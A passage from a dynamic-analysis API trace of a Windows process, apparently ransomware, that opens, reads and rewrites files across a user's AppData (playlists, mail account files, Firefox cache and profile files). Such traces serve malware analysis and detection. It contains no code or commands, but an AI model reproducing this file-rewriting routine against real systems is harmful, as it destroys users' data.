"c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\09_music_played_the_most.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0176.099] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0176.099] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x401 [0176.099] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0176.099] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0176.099] ReleaseMutex (hMutex=0x168) returned 1 [0176.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="09_Music_played_the_most.wpl", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0176.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="09_Music_played_the_most.wpl", cchWideChar=28, lpMultiByteStr=0x1f8fd5c, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="09_Music_played_the_most.wpl", lpUsedDefaultChar=0x0) returned 28 [0176.100] ReadFile (in: hFile=0x1dc, lpBuffer=0x1e99d58, nNumberOfBytesToRead=0x401, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e99d58*, lpNumberOfBytesRead=0x2fdf2bc*=0x401, lpOverlapped=0x0) returned 1 [0176.101] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0176.101] WriteFile (in: hFile=0x1dc, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x989, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x989, lpOverlapped=0x0) returned 1 [0176.102] CloseHandle (hObject=0x1dc) returned 1 [0176.102] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\05_pictures_taken_in_the_last_month.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0176.105] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0176.105] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x31d [0176.105] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0176.105] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0176.105] ReleaseMutex (hMutex=0x168) returned 1 [0176.105] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="05_Pictures_taken_in_the_last_month.wpl", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0176.105] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="05_Pictures_taken_in_the_last_month.wpl", cchWideChar=39, lpMultiByteStr=0x1fa54dc, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="05_Pictures_taken_in_the_last_month.wpl", lpUsedDefaultChar=0x0) returned 39 [0176.105] ReadFile (in: hFile=0x1dc, lpBuffer=0x2663858, nNumberOfBytesToRead=0x31d, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesRead=0x2fdf2bc*=0x31d, lpOverlapped=0x0) returned 1 [0176.127] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0176.127] WriteFile (in: hFile=0x1dc, lpBuffer=0x28469b8*, nNumberOfBytesToWrite=0x8a5, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x28469b8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x8a5, lpOverlapped=0x0) returned 1 [0176.127] CloseHandle (hObject=0x1dc) returned 1 [0176.127] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\mapisvc.inf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\outlook\\mapisvc.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0176.128] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0176.128] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x462 [0176.129] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0176.129] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0176.129] ReleaseMutex (hMutex=0x168) returned 1 [0176.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mapisvc.inf", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0176.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mapisvc.inf", cchWideChar=11, lpMultiByteStr=0x1f7342c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mapisvc.inf", lpUsedDefaultChar=0x0) returned 11 [0176.129] ReadFile (in: hFile=0x1dc, lpBuffer=0x269c668, nNumberOfBytesToRead=0x462, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x269c668*, lpNumberOfBytesRead=0x2fdf2bc*=0x462, lpOverlapped=0x0) returned 1 [0176.131] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0176.131] WriteFile (in: hFile=0x1dc, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x9ea, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x9ea, lpOverlapped=0x0) returned 1 [0176.131] CloseHandle (hObject=0x1dc) returned 1 [0176.131] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\account{af0db737-2ef9-4633-bf5e-1a6761ed1577}.oeaccount"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0176.132] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0176.132] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x6c8 [0176.132] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0176.132] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0176.132] ReleaseMutex (hMutex=0x168) returned 1 [0176.133] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", cchWideChar=55, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0176.133] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", cchWideChar=55, lpMultiByteStr=0x1f96bf4, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpUsedDefaultChar=0x0) returned 55 [0176.133] ReadFile (in: hFile=0x1dc, lpBuffer=0x28469b8, nNumberOfBytesToRead=0x6c8, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x28469b8*, lpNumberOfBytesRead=0x2fdf2bc*=0x6c8, lpOverlapped=0x0) returned 1 [0176.134] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0176.134] WriteFile (in: hFile=0x1dc, lpBuffer=0x26ae978*, nNumberOfBytesToWrite=0xc50, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesWritten=0x2fdf2d0*=0xc50, lpOverlapped=0x0) returned 1 [0176.134] CloseHandle (hObject=0x1dc) returned 1 [0176.134] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0176.135] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0176.135] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xe7 [0176.135] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0176.135] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0176.135] ReleaseMutex (hMutex=0x168) returned 1 [0176.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Garden.htm", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0176.136] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Garden.htm", cchWideChar=10, lpMultiByteStr=0x1f7342c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Garden.htm", lpUsedDefaultChar=0x0) returned 10 [0176.136] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ea4ca8, nNumberOfBytesToRead=0xe7, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea4ca8*, lpNumberOfBytesRead=0x2fdf2bc*=0xe7, lpOverlapped=0x0) returned 1 [0176.136] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0176.136] WriteFile (in: hFile=0x1dc, lpBuffer=0x28469b8*, nNumberOfBytesToWrite=0x66f, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x28469b8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x66f, lpOverlapped=0x0) returned 1 [0176.137] CloseHandle (hObject=0x1dc) returned 1 [0176.137] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0176.137] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0176.137] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xe6 [0176.137] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0176.138] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0176.138] ReleaseMutex (hMutex=0x168) returned 1 [0176.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Stars.htm", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0176.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Stars.htm", cchWideChar=9, lpMultiByteStr=0x1f733cc, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Stars.htm", lpUsedDefaultChar=0x0) returned 9 [0176.138] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ea4ca8, nNumberOfBytesToRead=0xe6, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea4ca8*, lpNumberOfBytesRead=0x2fdf2bc*=0xe6, lpOverlapped=0x0) returned 1 [0176.139] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0176.139] WriteFile (in: hFile=0x1dc, lpBuffer=0x28469b8*, nNumberOfBytesToWrite=0x66e, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x28469b8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x66e, lpOverlapped=0x0) returned 1 [0176.139] CloseHandle (hObject=0x1dc) returned 1 [0176.139] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\4B\\1D8FDd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\3\\4b\\1d8fdd01"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0177.408] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0177.408] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x20543 [0177.408] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0177.408] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.408] ReleaseMutex (hMutex=0x168) returned 1 [0177.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="1D8FDd01", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0177.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="1D8FDd01", cchWideChar=8, lpMultiByteStr=0x1f7362c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="1D8FDd01", lpUsedDefaultChar=0x0) returned 8 [0177.409] ReadFile (in: hFile=0x1f0, lpBuffer=0x2840938, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x2fdf278*=0x8000, lpOverlapped=0x0) returned 1 [0177.411] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x1f543 [0177.412] ReadFile (in: hFile=0x1f0, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0177.412] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x1f543 [0177.412] WriteFile (in: hFile=0x1f0, lpBuffer=0x289dad8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x289dad8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0177.413] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0177.413] WriteFile (in: hFile=0x1f0, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x2fdf28c*=0x8000, lpOverlapped=0x0) returned 1 [0177.413] CloseHandle (hObject=0x1f0) returned 1 [0177.413] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\23\\7E0FEd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\f\\23\\7e0fed01"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0177.414] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0177.414] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xf888 [0177.414] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0177.414] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.414] ReleaseMutex (hMutex=0x168) returned 1 [0177.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7E0FEd01", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0177.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7E0FEd01", cchWideChar=8, lpMultiByteStr=0x1f7352c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7E0FEd01", lpUsedDefaultChar=0x0) returned 8 [0177.414] ReadFile (in: hFile=0x1f0, lpBuffer=0x25a56a8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesRead=0x2fdf278*=0x4000, lpOverlapped=0x0) returned 1 [0177.417] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0xe888 [0177.417] ReadFile (in: hFile=0x1f0, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0177.417] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0xe888 [0177.417] WriteFile (in: hFile=0x1f0, lpBuffer=0x284aac8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x284aac8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0177.417] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0177.418] WriteFile (in: hFile=0x1f0, lpBuffer=0x2840938*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesWritten=0x2fdf28c*=0x4000, lpOverlapped=0x0) returned 1 [0177.418] CloseHandle (hObject=0x1f0) returned 1 [0177.418] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.sbstore" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.sbstore"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0177.419] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0177.419] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xe8 [0177.419] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0177.419] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.419] ReleaseMutex (hMutex=0x168) returned 1 [0177.419] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="test-malware-simple.sbstore", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0177.419] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="test-malware-simple.sbstore", cchWideChar=27, lpMultiByteStr=0x1f8fc6c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="test-malware-simple.sbstore", lpUsedDefaultChar=0x0) returned 27 [0177.419] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ea4ca8, nNumberOfBytesToRead=0xe8, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea4ca8*, lpNumberOfBytesRead=0x2fdf2bc*=0xe8, lpOverlapped=0x0) returned 1 [0177.420] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0177.420] WriteFile (in: hFile=0x1f0, lpBuffer=0x2846ab8*, nNumberOfBytesToWrite=0x670, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x2846ab8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x670, lpOverlapped=0x0) returned 1 [0177.420] CloseHandle (hObject=0x1f0) returned 1 [0177.420] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.mar" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\updates\\0\\update.mar"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0177.421] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0177.421] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x927c0 [0177.421] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0177.421] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 